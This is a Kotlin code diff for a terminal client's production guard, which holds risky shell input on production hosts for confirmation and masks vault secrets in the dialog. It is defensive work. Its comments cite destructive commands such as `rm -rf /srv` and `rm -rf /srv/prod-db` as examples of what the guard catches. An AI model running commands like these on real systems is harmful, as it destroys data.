+        // Separate classifications: [MAX_GUARDED_CANDIDATES] bounds the work per list, and
         // concatenating them let a prompt row on screen push the last line of a full-length paste out
         // of the classification — the end of a script is where its cleanup lives.
-        val own = ProductionGuard.inspect(runLines, policy)
+        val ownFinding = own(policy)
         val seen = ProductionGuard.inspect(guesses.screen, policy)
         // A prefix of the shell's line is classified beside what was read off the screen, and kept
         // apart from it: it is text the client tracked, not text the host drew, and it is by
         // definition not all of the line.
         val partial = guesses.partial
-        val prefix = ProductionGuard.inspect(listOfNotNull(partial?.classify), policy)
+        val prefix = partial?.let { ProductionGuard.inspect(listOf(it.classify), policy) }
         val guessed = ProductionGuard.worse(seen, prefix)
-        val guarded = ProductionGuard.worse(own, guessed) ?: return false
+        var guarded = ProductionGuard.worse(ownFinding, guessed)
+        // Only when no rule found a reason: input the classifier could not fully read — a line past
+        // the caps, or a join longer than any rule reads — is confirmed for that fact alone. A rule's
+        // finding wins outright, whatever its length: it explains a risk that was actually read,
+        // and one confirmation is asked either way.
+        var overflowedPrefix = false
+        var overflowedScreen = false
+        if (guarded == null) {
+            val blockOverflow = ProductionGuard.overflow(input.text, policy)
+            val joinOverflow = partial?.let { ProductionGuard.overflow(it.classify, policy) }
+            // The screen's own candidates need the same net: the visible shell line — a soft-wrap
+            // join now — can run past what any rule reads, and a recalled command whose risk sits
+            // beyond the classifier's window used to leave with no dialog at all.
+            val screenOverflow = guesses.screen.firstNotNullOfOrNull { ProductionGuard.overflow(it, policy) }
+            guarded = ProductionGuard.worse(ProductionGuard.worse(blockOverflow, joinOverflow), screenOverflow)
+                ?: return false
+            overflowedPrefix = guarded === joinOverflow
+            overflowedScreen = guarded === screenOverflow
+        }
         // A guess that won is drawn as the line itself, never as the join it was classified by. With
         // no drawable form there is nothing to put here: standing another finding in its place would
         // pair one line with another's reason, which is the shape this whole change removes.
+        val fromPrefix = guarded === prefix || overflowedPrefix
+        val rawFound = if (fromPrefix) partial?.onLine else guarded.command
+        val presented = rawFound?.let(present)
         val found = Found(
-            text = if (guarded === prefix) partial?.onLine else guarded.command,
-            fromPrefix = guarded === prefix,
-            fromScreen = guarded === guessed,
+            text = presented,
+            fromPrefix = fromPrefix,
+            fromScreen = guarded === guessed || overflowedScreen,
+            // The mask changed the drawn line: a raw count beside it would fire "shown in part"
+            // over a fully drawn box, exactly what the quote's masked count avoids.
+            masked = presented != null && presented != rawFound,
+            rawLength = rawFound?.length ?: 0,
         )
         // Before the publish, not after: a Confirm that arrives between the two finds the question
         // and the block it is about together, rather than a dialog with nothing behind it.
-        held = HeldInput(text, from)
-        publish(guarded, willRun = quote().trimEnd(), found = found, partial = partial)
+        held = input
+        publish(
+            guarded,
+            willRun = present(quote().trimEnd()),
+            found = found,
+            onLine = partial?.onLine?.let(present),
+            screenCut = guesses.screenCut,
+        )
         return true
     }
 
@@ -209,10 +252,17 @@ class ProductionGuardHold {
      * holds. A dialog then quotes what is being sent and nothing else — a reason with no line under
      * it is a poor dialog, and a line nobody will run is a wrong one.
      */
-    private data class Found(val text: String?, val fromPrefix: Boolean, val fromScreen: Boolean)
+    private data class Found(
+        val text: String?,
+        val fromPrefix: Boolean,
+        val fromScreen: Boolean,
+        val masked: Boolean = false,
+        /** Length of the drawable line before masking — what [GuardedCommand.fullLength] is compared against. */
+        val rawLength: Int = 0,
+    )
 
-    /** What the client only guesses about the shell's line: what the screen shows, and what it tracked. */
-    private data class Guesses(val screen: List<String>, val partial: PartialGuess?)
+    /** What the client only guesses about the shell's line: what the screen shows, whether the cursor row continues past the cursor, and what it tracked. */
+    private data class Guesses(val screen: List<String>, val screenCut: Boolean, val partial: PartialGuess?)
 
     /**
      * The four facts the dialog reads, published together. A recomposition that saw [pending] set
@@ -221,26 +271,20 @@ class ProductionGuardHold {
      * [found] is the line that tripped the guard as it may be *drawn* — for a guess about a line the
      * client only holds the beginning of, that is the beginning and not the join it was classified
      * by. A quote that cannot carry it gets it beside itself instead of in place of it.
+     *
+     * [screenCut] says the cursor row continues past the cursor: a screen-sourced line is then a
+     * beginning of what runs, so no count is published over it — the dialog says "shown in part"
+     * with no number rather than a number that claims the whole command is on screen.
      */
-    private fun publish(guarded: GuardedCommand, willRun: String, found: Found, partial: PartialGuess?) {
+    private fun publish(guarded: GuardedCommand, willRun: String, found: Found, onLine: String?, screenCut: Boolean) {
         val shown = willRun.take(MAX_DRAWN_COMMAND_CHARS)
         // One case, and one only: nothing to quote. A bare Enter over a line the client never saw
         // runs what the shell holds, so that line is the quote and there is nothing else to show.
         val standIn = found.text?.takeIf { shown.isBlank() }
-        // What the shell already holds comes first, whoever tripped the guard: the quote cannot claim
-        // a line the client is only guessing at, and leaving it out of the dialog draws a service
-        // restart over an `rm -rf` that runs before it. It carries no length — the client knows it
-        // holds a beginning, not how much more there is.
-        val onLine = partial?.onLine
-        val aside = when {
-            standIn != null -> null
-            // The line the reason is about comes first: there is one block, and a dialog explaining a
-            // recursive delete beside an unrelated fragment names neither.
-            found.text != null && !shown.contains(found.text) ->
-                GuardAside(found.text, guarded.fullLength.takeIf { !found.fromPrefix }, found.fromScreen)
-            onLine != null && !shown.contains(onLine) -> GuardAside(onLine, null, onLine = true)
-            else -> null
-        }
+        // A count is only true for a line whose whole extent something read: not for a prefix the
+        // shell completed, and not for a screen row the cursor sits inside of.
+        val partialFinding = found.fromPrefix || (found.fromScreen && screenCut)
+        val aside = if (standIn != null) null else asideFor(shown, guarded, found, onLine, partialFinding)
         // One snapshot for all four: a recomposition that saw `pending` before the quote was written
         // would draw the dialog with nothing in it.
         Snapshot.withMutableSnapshot {
@@ -251,13 +295,54 @@ class ProductionGuardHold {
             pendingAside = aside
             // A blank quote is a bare Enter over a line the client never saw, and then the tripped
             // line really is all there is — counting the input's own length would name characters the
-            // user is not being told about. A prefix has no count at all behind it.
+            // user is not being told about. A prefix — tracked or read off a row the cursor sits
+            // inside of — has no count at all behind it.
+            // The count describes the MASKED text the dialog draws, not the raw input: a pre-mask
+            // count fired "shown in part" over a fully drawn masked quote — an alarm with nothing
+            // to scroll to. What the mask hides, the mask itself already marks.
             pendingQuoteLength = when {
                 shown.isNotBlank() -> willRun.length
-                found.fromPrefix -> null
+                partialFinding -> null
+                // A masked stand-in follows the same rule as the aside: the raw count belongs to a
+                // string the dialog does not draw.
+                found.masked -> if (guarded.fullLength > found.rawLength) null else standIn?.length
                 else -> guarded.fullLength
             }
         }
+    }
+
+    /**
+     * The block drawn beside the quote when the quote does not carry the tripped line. What the
+     * shell already holds comes first, whoever tripped the guard: the quote cannot claim a line the
+     * client is only guessing at, and leaving it out of the dialog draws a service restart over an
+     * `rm -rf` that runs before it — and the line the reason is about outranks it: there is one
+     * block, and a dialog explaining a recursive delete beside an unrelated fragment names neither.
+     * The on-line half carries no length: the client knows it holds a beginning, not how much more
+     * there is.
+     */
+    private fun asideFor(
+        shown: String,
+        guarded: GuardedCommand,
+        found: Found,
+        onLine: String?,
+        partialFinding: Boolean,
+    ): GuardAside? = when {
+        found.text != null && !shown.contains(found.text) ->
+            GuardAside(found.text, asideLength(guarded, found, partialFinding), found.fromScreen)
+        onLine != null && !shown.contains(onLine) -> GuardAside(onLine, null, onLine = true)
+        else -> null
+    }
+
+    /**
+     * The count published beside an aside. A raw length is honest only for a line the mask never
+     * touched; a masked line that was also cut has no honest count at all (the uncut tail is
+     * unknown and the drawn text is not the raw text), and a masked line drawn whole counts as
+     * exactly what is on screen.
+     */
+    private fun asideLength(guarded: GuardedCommand, found: Found, partialFinding: Boolean): Int? = when {
+        partialFinding -> null
+        found.masked -> if (guarded.fullLength > found.rawLength) null else found.text?.length
+        else -> guarded.fullLength
     }
 
     /**

--- a/composeApp/src/commonMain/kotlin/app/skerry/ui/terminal/SnippetPalette.kt
+++ b/composeApp/src/commonMain/kotlin/app/skerry/ui/terminal/SnippetPalette.kt
@@ -83,7 +83,7 @@ internal fun SnippetPaletteButton(active: Session?, requests: SharedFlow<Unit>? 
                 properties = PopupProperties(focusable = true),
             ) {
                 SnippetPalette(manager) { entry ->
-                    manager.run(entry.id, recording = terminal.recording) { text -> terminal.sendUserInputGuarded(text) }
+                    manager.run(entry.id, recording = terminal.recording) { text, secrets -> terminal.sendUserInputGuarded(text, secrets) }
                     open = false
                 }
             }

--- a/composeApp/src/commonMain/kotlin/app/skerry/ui/terminal/TerminalCommandGuard.kt
+++ b/composeApp/src/commonMain/kotlin/app/skerry/ui/terminal/TerminalCommandGuard.kt
@@ -1,0 +1,204 @@
+package app.skerry.ui.terminal
+
+import app.skerry.shared.guard.ProductionGuard
+import app.skerry.shared.terminal.AutocompleteEngine
+import app.skerry.shared.terminal.isSafeTerminalInputChar
+import app.skerry.ui.snippet.maskSecrets
+
+/** Ctrl-O — accept-line-and-down-history: it runs the line and recalls the next entry into it. */
+internal const val ACCEPT_LINE_AND_DOWN = '\u000F'
+
+/**
+ * What can make the shell run the line it is holding: Enter in both forms, plus readline's
+ * accept-line-and-down-history (Ctrl-O), which the mobile keybar reaches as ctrl + "/".
+ */
+internal val RUN_LINE_CONTROLS = charArrayOf('\r', '\n', ACCEPT_LINE_AND_DOWN)
+
+/**
+ * The terminal-specific half of the production guard, next to [ProductionGuardHold] — which owns
+ * the hold/confirm/dismiss rules and knows nothing about terminals. What lives here is what a
+ * terminal contributes to the question: which candidates one input block offers, what may be
+ * quoted for it, what the screen adds, and what a block sent past the typed path did to the
+ * tracked line. It needs only the tracked line (the engine), the cursor row and the alt-screen
+ * flag; everything else — replaying held input, secrets, history — stays with the session.
+ */
+internal class TerminalCommandGuard(
+    private val engine: AutocompleteEngine,
+    private val altScreen: () -> Boolean,
+    /** Visible cursor row up to the cursor column — the shell line as the user sees it. */
+    private val lineToCursor: () -> String,
+    /** The whole visible cursor row, trailing blanks trimmed. */
+    private val rowText: () -> String,
+    /** Whether the cursor row carries text at or right of the cursor — the line continues past it. */
+    private val lineContinues: () -> Boolean,
+) {
+    /** Hold/confirm/dismiss state; the dialog reads its `pending*` fields through the session. */
+    val hold = ProductionGuardHold()
+
+    /**
+     * Holds a typed input block when it would run a risky command; `true` means nothing may be sent.
+     *
+     * Only an input block containing Enter can run something, so that is the only thing held —
+     * typing itself stays live (a half-typed line the user is still editing must keep echoing).
+     * Alt-screen is exempt: inside vim/htop there is no shell line, and Enter is not "run this".
+     */
+    fun holdTyped(text: String): Boolean {
+        if (altScreen()) return false
+        if (text.none { it in RUN_LINE_CONTROLS }) return false
+        return holdInput(text, HeldInputSource.Typed)
+    }
+
+    /**
+     * Holds a ready-made command (snippet, palette, an AI-confirmed line). Unlike typed input the
+     * command is known verbatim, but it still lands on whatever the line already holds — which is
+     * what [lineGuess] covers. [secrets] are the resolved vault values the input carries: they are
+     * masked in everything the dialog draws, and in nothing that is classified or replayed.
+     */
+    fun holdCommand(text: String, secrets: List<String> = emptyList()): Boolean =
+        holdInput(text, HeldInputSource.Command, secrets)
+
+    /**
+     * Holds a paste that would run: one carrying a newline runs the moment it lands, while one
+     * without only fills the shell line — the Enter that would run it is guarded as typed input.
+     */
+    fun holdPaste(text: String): Boolean {
+        if (!hold.policy.production) return false
+        if (text.none { it == '\n' || it == '\r' }) return false
+        return holdInput(text, HeldInputSource.Paste)
+    }
+
+    private fun holdInput(text: String, from: HeldInputSource, secrets: List<String> = emptyList()): Boolean =
+        hold.hold(
+            text,
+            from,
+            quote = quotedInput(text),
+            present = maskOf(secrets),
+            screenGuesses = { screenCandidates() },
+            screenLineCut = { lineContinues() },
+            partialGuess = { lineGuess(text) },
+        ) { policy -> ProductionGuard.inspectCandidates(ProductionGuard.candidatesOf(text), policy) }
+
+    /**
+     * What the client only *guesses* an input will run, as opposed to the lines it carries itself:
+     * the shell's line as the screen draws it, and the tracked line joined to the block's first
+     * line. Classified beside the block, never inside its budget — sharing one cap let a guess push
+     * the last line of a full-length paste out of the classification, and the end of a script is
+     * where its cleanup lives.
+     *
+     * Nothing off the alternate screen: inside vim or htop the cursor row is a line of a file, not a
+     * command, and classifying it holds a paste against text the user is only looking at.
+     *
+     * The join exists because a snippet fired onto a half-typed `rm -rf ` runs `rm -rf /srv`, and
+     * because the classifier's patterns are word-anchored — a tracked line ending in a word joins
+     * into `xyzrm -rf /srv` and reads as harmless, so the block's own first line is offered too
+     * ([ProductionGuard.candidatesOf]). The join is classified whatever the client still believes
+     * about the line; what belief decides is whether any of it may be *drawn* — see [PartialGuess].
+     * A line that wrapped onto another row is beyond all of this.
+     */
+    private fun lineGuess(text: String): PartialGuess? {
+        if (altScreen()) return null
+        val onLine = engine.currentLine
+        // Whatever the client tracked, trusted or not: the classifier needs the join either way — a
+        // snippet fired onto a half-typed `rm -rf ` runs `rm -rf /srv`, and the block's own lines
+        // say nothing about that. What being trusted decides is only whether the quote can claim it;
+        // a line it cannot claim is drawn beside the quote instead, never as it.
+        if (onLine.isEmpty()) return null
+        // The controls that run a line are cut off the end, as [quotedInput] cuts them: a candidate
+        // carrying one is a candidate no quote can contain, and the dialog would draw it as a second
+        // line with the control spelled out.
+        val first = text.lineSequence().firstOrNull().orEmpty()
+        val join = (onLine + first).trimEnd { it in RUN_LINE_CONTROLS }
+        // A bare Enter over a completed line leaves the prefix as the whole candidate, and a prefix
+        // the screen already carries says nothing the row does not — it would say it worse, since
+        // candidates tie on risk by length and the prefix would win and be quoted: `rm -rf /sr` for
+        // a line reading `rm -rf /srv/prod-db`. A block that carries text of its own is a different
+        // thing: the join is then the only candidate equal to what will run.
+        if (join == onLine && screenCandidates().any { it.contains(onLine) }) return null
+        // Drawable only while the shell has merely appended to it: once something is typed onto a
+        // completed line the two have parted company, and what is tracked is a string neither holds.
+        return PartialGuess(classify = join, onLine = onLine.takeIf { !engine.lineSuspect || engine.linePartial })
+    }
+
+    /**
+     * What the screen says is on the shell's line: the row up to the cursor, and the whole line —
+     * soft-wrap joined — as well. The whole line is what actually runs after a history recall with
+     * the cursor stepped back inside it (reading only up to the cursor confirmed `…prod-` while
+     * `…prod-db` ran), and after a recall that wrapped, where the head of the line sits on the row
+     * ABOVE the cursor and the cursor row alone never carries the risk. Nothing off the alternate
+     * screen: inside vim or htop the cursor row is a line of a file, not a command.
+     */
+    private fun screenCandidates(): List<String> {
+        if (altScreen()) return emptyList()
+        val toCursor = ProductionGuard.promptCandidates(lineToCursor())
+        return (toCursor + ProductionGuard.promptCandidates(rowText())).distinct()
+    }
+
+    /**
+     * Follows what [text] — sent to the PTY without passing through the typed path — did to the
+     * shell's line, in the caller's own order: the guard reads the tracked line on the way to the
+     * next send.
+     *
+     * A block carrying a run-line control ran: what is left on the line is the tail after the last
+     * one, and nothing at all after Ctrl-O, which pulls the next history entry in. Anything else
+     * merely landed on the line — the assistant's Edit, the key panel's Esc and arrows — and the
+     * engine models those bytes better than this can: it clears on Esc, backs up on a backspace,
+     * and marks the line suspect for the edits it cannot follow.
+     */
+    fun trackSent(text: String) {
+        val ran = text.indexOfLast { it in RUN_LINE_CONTROLS }
+        when {
+            ran >= 0 && text[ran] == ACCEPT_LINE_AND_DOWN -> engine.lineRanElsewhere(null)
+            ran >= 0 -> engine.lineRanElsewhere(text.substring(ran + 1))
+            else -> engine.onUserInput(text.encodeToByteArray())
+        }
+    }
+
+    /**
+     * The same thing to quote in the confirmation, with the controls that make it run cut off the
+     * end — a `\r` or the mobile keybar's Ctrl-O is what sends the line, not a character of it.
+     *
+     * Only the prefix is dropped when the tracked line is known to be stale — a control byte the
+     * engine cannot replay (Ctrl-W, Ctrl-K) leaves it holding text the shell no longer has. What
+     * arrived now is still known verbatim and still runs, so it is still quoted; for a typed block
+     * that is a bare `\r` and the quote comes out empty, which is what makes the guard fall back to
+     * the line it tripped on.
+     */
+    private fun quotedInput(text: String): () -> String {
+        // The line is read here, beside [lineGuess]'s own read, and joined only if the guard finds
+        // something. Reading it again after the classification would let the two disagree — the
+        // dialog would explain a reason found for one line while quoting another — and joining it
+        // eagerly would build two copies of a multi-megabyte paste that turns out to be harmless.
+        val onLine = if (engine.lineSuspect) "" else engine.currentLine
+        return { (onLine + text).trimEnd { c -> c in RUN_LINE_CONTROLS } }
+    }
+
+    /**
+     * The command the shell finished for a line this only holds the beginning of. Read off the
+     * screen because that is the only place it exists, and taken only when it starts with what was
+     * actually typed: the row is the host's to draw, and a line that wrapped leaves nothing but its
+     * tail on it. Recording nothing is what the engine would have done; recording the row itself
+     * would put a command nobody ran into the host's stored history and offer it back as a
+     * suggestion, on this host and in the palette across all of them — which draws what it stores,
+     * so a row carrying a bidi override would read there as a command it is not.
+     */
+    fun completedLine(typed: String): String? {
+        // Same on the alternate screen: the cursor row is a line of a file, and a file's line is not
+        // a command that ran.
+        if (typed.isEmpty() || altScreen()) return null
+        return ProductionGuard.promptCandidates(lineToCursor())
+            .lastOrNull()
+            // Strictly longer: a Tab whose completion has not echoed leaves the row reading exactly
+            // what was typed, and that is the prefix rather than a command anyone ran.
+            ?.takeIf { it.length > typed.length && it.startsWith(typed) && it.all(::isSafeTerminalInputChar) }
+    }
+
+    /**
+     * How input carrying resolved vault [secrets] may be drawn: every secret span replaced with the
+     * same mask the snippet dialog previewed one step earlier. Applied only to what the dialog
+     * shows — the classifier reads the real text, and Confirm replays the real bytes.
+     */
+    private fun maskOf(secrets: List<String>): (String) -> String {
+        if (secrets.none { it.isNotBlank() }) return { it }
+        return { text -> maskSecrets(text, secrets) }
+    }
+}

--- a/composeApp/src/commonMain/kotlin/app/skerry/ui/terminal/TerminalScreenState.kt
+++ b/composeApp/src/commonMain/kotlin/app/skerry/ui/terminal/TerminalScreenState.kt
@@ -24,7 +24,6 @@ import app.skerry.shared.terminal.TerminalPos
 import app.skerry.shared.terminal.TerminalSelection
 import app.skerry.shared.terminal.TerminalSession
 import app.skerry.shared.terminal.TerminalState
-import app.skerry.shared.terminal.isSafeTerminalInputChar
 import app.skerry.shared.terminal.wrapsToNextRow
 import app.skerry.shared.terminal.TerminalStepMark
 import app.skerry.shared.terminal.bracketedPasteWrap
@@ -453,6 +452,13 @@ class TerminalScreenState(
         mousePixels = emulator.mousePixels
         bracketedPaste = emulator.bracketedPaste
         focusReporting = emulator.focusReporting
+        // Crossing the alt-screen boundary resets the tracked line in both directions: entering,
+        // because whatever was typed next goes into a file and must not complete a shell line it
+        // never joined; leaving, because the TUI owned the keyboard and the shell's line is fresh.
+        // Best-effort by design: the engine's fields lose but never tear (see AutocompleteEngine),
+        // so a keystroke racing this publish can keep the pre-TUI line until Enter or Ctrl-U
+        // clears it — the same window every cross-thread engine write already lives with.
+        if (altScreen != emulator.altScreen) autocomplete.reset()
         altScreen = emulator.altScreen
         // The echo of what was typed arrives here, and the ghost continues what this snapshot shows —
         // so this is where it is recomputed. Also clears it on entering a fullscreen TUI (vim/htop):
@@ -616,7 +622,8 @@ class TerminalScreenState(
     /**
      * Keyboard/IME user input: feeds the autocomplete engine (line and history tracking) and sends
      * to the PTY. Separate from [send]/[sendBytes], which are the raw paths — what they carry
-     * reaches the tracked line only where the sender says what it did to it ([trackSentText]).
+     * reaches the tracked line only where the sender says what it did to it
+     * ([TerminalCommandGuard.trackSent]).
      */
     fun typeInput(text: String, guarded: Boolean = true, mirror: Boolean = true) {
         inputVersion++
@@ -638,11 +645,20 @@ class TerminalScreenState(
         }
         // guarded=false: the caller already asked (broadcast confirms once for the whole fan-out,
         // where a per-session hold would strand commands in tabs nobody is looking at).
-        if (guarded && holdForProductionGuard(text)) return
+        if (guarded && guard.holdTyped(text)) return
         deliverTypedInput(text, mirror)
     }
 
     private fun deliverTypedInput(text: String, mirror: Boolean = true) {
+        // Inside a fullscreen TUI there is no shell line: what is typed edits a file, and an Enter
+        // commits a line of IT — not a command. The engine sees none of it, or a token from an
+        // edited config would land in vault-backed history and surface as a ghost suggestion and in
+        // the cross-host palette.
+        if (altScreen) {
+            send(text)
+            if (mirror) inputMirror?.invoke(text, MirroredInput.Typed)
+            return
+        }
         // Taken before the input is applied: what the shell completed with a Tab is on the line now,
         // and the engine is about to clear it.
         val blind = autocomplete.linePartial
@@ -654,9 +670,12 @@ class TerminalScreenState(
             // of them, builds no history at all.
             // Only a block that runs the line as it stands: one that adds to it first leaves the
             // screen a row short of what ran, and `typed` a row behind the screen.
-            ?: text.takeIf { blind && it.firstOrNull()?.let { c -> c in runLineControls } == true }
-                ?.let { completedLine(typed) }
-                ?.also { autocomplete.commandHistory.record(it) }
+            // Session-only: the finished text is the host's drawing, so it serves this session's
+            // ghost and reverse search but is never persisted — a stored copy would surface in the
+            // cross-host palette as a command nobody typed.
+            ?: text.takeIf { blind && it.firstOrNull()?.let { c -> c in RUN_LINE_CONTROLS } == true }
+                ?.let { guard.completedLine(typed) }
+                ?.also { autocomplete.commandHistory.record(it, sessionOnly = true) }
         refreshSuggestion(lineChanged = true)
         send(text)
         // Mirrored from here, not from typeInput: input held by the production guard must reach the
@@ -665,7 +684,7 @@ class TerminalScreenState(
         // Command was committed with Enter (and was echoed): persist the history snapshot for this host.
         if (committed != null) {
             val commands = autocomplete.commandHistory.commands
-            onHistoryChanged?.invoke(commands)
+            onHistoryChanged?.invoke(autocomplete.commandHistory.persistedCommands)
             // The host's own tooling becomes a known command after its first run.
             vocabulary = SessionVocabulary(commands)
             // Only commands run *here* count: a preloaded history belongs to earlier sessions whose
@@ -682,182 +701,61 @@ class TerminalScreenState(
     // UI from the session's host profile (see [app.skerry.ui.host.isProdHostId]) and kept live, so
     // adding or removing the tag arms/disarms an open session.
 
-    // The hold/confirm/dismiss rules live in [ProductionGuardHold]; what belongs here is only what
-    // is terminal-specific — which candidates a path offers, and how a held block is replayed.
-    private val guard = ProductionGuardHold()
-
-    // What can make the shell run the line it is holding: Enter in both forms, plus readline's
-    // accept-line-and-down-history (Ctrl-O), which the mobile keybar reaches as ctrl + "/".
-    private val runLineControls = charArrayOf('\r', '\n', ACCEPT_LINE_AND_DOWN)
+    // The hold/confirm/dismiss rules live in [ProductionGuardHold]; which candidates a path offers
+    // and what may be quoted for them live in [TerminalCommandGuard]. What belongs here is only how
+    // a held block is replayed, and the secret/alt-screen state the guard cannot know.
+    private val guard = TerminalCommandGuard(
+        engine = autocomplete,
+        altScreen = { altScreen },
+        lineToCursor = ::screenLineToCursor,
+        rowText = ::screenRowText,
+        lineContinues = ::screenRowContinues,
+    )
 
     /**
      * What the production guard asks about in this session (host tag, root login, the
      * confirm-warnings setting). [ProductionGuardPolicy.Off] — no guard at all.
      */
     var guardPolicy: ProductionGuardPolicy
-        get() = guard.policy
-        set(value) { guard.policy = value }
+        get() = guard.hold.policy
+        set(value) { guard.hold.policy = value }
 
     /** Command held by the guard, awaiting the user's confirmation; `null` when nothing is pending. */
-    val pendingGuarded: GuardedCommand? get() = guard.pending
+    val pendingGuarded: GuardedCommand? get() = guard.hold.pending
 
     /** What [confirmGuardedCommand] would run, as the confirmation has to quote it. */
-    val pendingGuardedQuote: String get() = guard.pendingQuote
+    val pendingGuardedQuote: String get() = guard.hold.pendingQuote
 
     /** How long that input really is — the quote stops at what a dialog can draw, this does not. */
-    val pendingGuardedQuoteLength: Int? get() = guard.pendingQuoteLength
+    val pendingGuardedQuoteLength: Int? get() = guard.hold.pendingQuoteLength
 
     /** The line the guard tripped on when the quote does not carry it; drawn beside the quote. */
-    val pendingGuardedAside: GuardAside? get() = guard.pendingAside
-
-    /**
-     * Holds [text] when it would run a risky command on a production session; `true` means nothing
-     * was sent (see [ProductionGuardHold.hold] for when a held block is dropped instead).
-     *
-     * Only an input block containing Enter can run something, so that is the only thing held —
-     * typing itself stays live (a half-typed line the user is still editing must keep echoing).
-     * Alt-screen is exempt: inside vim/htop there is no shell line, and Enter is not "run this".
-     *
-     * The command is guessed from two sources, because the client never truly knows it: the locally
-     * tracked line (what was typed here) and the screen line up to the cursor (which also covers a
-     * command recalled with arrow-up, where nothing was typed at all).
-     */
-    private fun holdForProductionGuard(text: String): Boolean {
-        if (altScreen) return false
-        if (text.none { it in runLineControls }) return false
-        return guard.hold(
-            text,
-            HeldInputSource.Typed,
-            quote = quotedInput(text),
-            screenGuesses = { screenCandidates() },
-            partialGuess = { lineGuess(text) },
-        ) { ownCandidates(text) }
-    }
+    val pendingGuardedAside: GuardAside? get() = guard.hold.pendingAside
 
     /**
      * Runs a ready-made command (snippet, palette, any caller that already has the full line) with
      * the guard in front of it. Unlike [typeInput] the command itself is known verbatim, but it
-     * still lands on whatever the line already holds — which is what [lineGuess] covers.
+     * still lands on whatever the line already holds — which is what the guard's line guess covers.
      * Falls back to [sendUserInput] when the session is not production or the command is harmless.
-     */
-    fun sendUserInputGuarded(text: String) {
-        val held = guard.hold(
-            text,
-            HeldInputSource.Command,
-            quote = quotedInput(text),
-            screenGuesses = { screenCandidates() },
-            partialGuess = { lineGuess(text) },
-        ) { ownCandidates(text) }
-        if (held) return
-        sendUserInput(text)
-    }
-
-    /**
-     * What the client only *guesses* an input will run, as opposed to the lines it carries itself:
-     * the shell's line as the screen draws it, and the tracked line joined to the block's first line.
-     * Classified beside the block, never inside its budget — sharing one cap let a guess push the
-     * last line of a full-length paste out of the classification, and the end of a script is where
-     * its cleanup lives.
      *
-     * Nothing off the alternate screen: inside vim or htop the cursor row is a line of a file, not a
-     * command, and classifying it holds a paste against text the user is only looking at.
-     *
-     * The join exists because a snippet fired onto a half-typed `rm -rf ` runs `rm -rf /srv`, and
-     * because the classifier's patterns are word-anchored — a tracked line ending in a word joins
-     * into `xyzrm -rf /srv` and reads as harmless, so the block's own first line is offered too
-     * ([ProductionGuard.candidatesOf]). The join is classified whatever the client still believes
-     * about the line; what belief decides is whether any of it may be *drawn* — see [PartialGuess].
-     * A line that wrapped onto another row is beyond all of this.
+     * [secrets] are the resolved vault values the line carries (a snippet's or runbook step's
+     * `${'$'}{{vault:…}}`): the dialog masks them exactly as the run confirmation did one step
+     * earlier, instead of printing the resolved line in clear.
      */
-    private fun lineGuess(text: String): PartialGuess? {
-        // Not on the alternate screen: what is being typed there goes into a file, not onto a shell
-        // line, and the guard would hold a paste against text the user is only editing.
-        if (altScreen) return null
-        val onLine = autocomplete.currentLine
-        // Whatever the client tracked, trusted or not: the classifier needs the join either way — a
-        // snippet fired onto a half-typed `rm -rf ` runs `rm -rf /srv`, and the block's own lines
-        // say nothing about that. What being trusted decides is only whether the quote can claim it;
-        // a line it cannot claim is drawn beside the quote instead, never as it.
-        if (onLine.isEmpty()) return null
-        // The controls that run a line are cut off the end, as [quotedInput] cuts them: a candidate
-        // carrying one is a candidate no quote can contain, and the dialog would draw it as a second
-        // line with the control spelled out.
-        val first = text.lineSequence().firstOrNull().orEmpty()
-        val join = (onLine + first).trimEnd { it in runLineControls }
-        // A bare Enter over a completed line leaves the prefix as the whole candidate, and a prefix
-        // the screen already carries says nothing the row does not — it would say it worse, since
-        // candidates tie on risk by length and the prefix would win and be quoted: `rm -rf /sr` for
-        // a line reading `rm -rf /srv/prod-db`. A block that carries text of its own is a different
-        // thing: the join is then the only candidate equal to what will run.
-        if (join == onLine && screenCandidates().any { it.contains(onLine) }) return null
-        // Drawable only while the shell has merely appended to it: once something is typed onto a
-        // completed line the two have parted company, and what is tracked is a string neither holds.
-        return PartialGuess(classify = join, onLine = onLine.takeIf { !autocomplete.lineSuspect || autocomplete.linePartial })
-    }
-
-    /**
-     * What the screen says is on the shell's line. Nothing off the alternate screen: inside vim or
-     * htop the cursor row is a line of a file, not a command, and classifying it holds a paste
-     * against text the user is only looking at.
-     */
-    private fun screenCandidates(): List<String> =
-        if (altScreen) emptyList() else ProductionGuard.promptCandidates(screenLineToCursor())
-
-    /**
-     * Follows what [text] — sent to the PTY without passing through [typeInput] — did to the shell's
-     * line, in the caller's own order: the guard reads the tracked line on the way to the next send.
-     *
-     * A block carrying a run-line control ran: what is left on the line is the tail after the last
-     * one, and nothing at all after Ctrl-O, which pulls the next history entry in. Anything else
-     * merely landed on the line — the assistant's Edit, the key panel's Esc and arrows — and the
-     * engine models those bytes better than this can: it clears on Esc, backs up on a backspace,
-     * and marks the line suspect for the edits it cannot follow.
-     */
-    private fun trackSentText(text: String) {
-        val ran = text.indexOfLast { it in runLineControls }
-        when {
-            ran >= 0 && text[ran] == ACCEPT_LINE_AND_DOWN -> autocomplete.lineRanElsewhere(null)
-            ran >= 0 -> autocomplete.lineRanElsewhere(text.substring(ran + 1))
-            else -> autocomplete.onUserInput(text.encodeToByteArray())
+    fun sendUserInputGuarded(text: String, secrets: List<String> = emptyList()) {
+        // The same exemption [typeInput] makes: a line answering a password prompt is a secret, and
+        // parking it in a confirmation dialog would put it on screen in clear text.
+        if (awaitingSecret) {
+            sendUserInput(text)
+            return
         }
-        // The ghost belonged to the line as it was; drawn over the new one it offers a completion of
-        // text the shell does not have, and Tab would send its tail.
-        refreshSuggestion(lineChanged = true)
-    }
-
-    /**
-     * What [text] may run once it lands on the shell's line. A snippet fired onto a half-typed
-     * `rm -rf ` runs `rm -rf /srv`, so the tracked line joined to the first line is one candidate —
-     * classifying the block alone would let that through with no question asked.
-     *
-     * What it will land on is a guess and lives in [lineGuess] and [screenCandidates]; these are the lines the input
-     * carries itself, and all of them are read — a soft-keyboard delta or an IME clipboard insert
-     * arrives whole, so a risky command can sit on any line of it, not just the first.
-     */
-    private fun ownCandidates(text: String): List<String> = ProductionGuard.candidatesOf(text)
-
-    /**
-     * The same thing to quote in the confirmation, with the controls that make it run cut off the
-     * end — a `\r` or the mobile keybar's Ctrl-O is what sends the line, not a character of it.
-     *
-     * Only the prefix is dropped when the tracked line is known to be stale — a control byte the
-     * engine cannot replay (Ctrl-W, Ctrl-K) leaves it holding text the shell no longer has. What
-     * arrived now is still known verbatim and still runs, so it is still quoted; for a typed block
-     * that is a bare `\r` and the quote comes out empty, which is what makes the guard fall back to
-     * the line it tripped on.
-     */
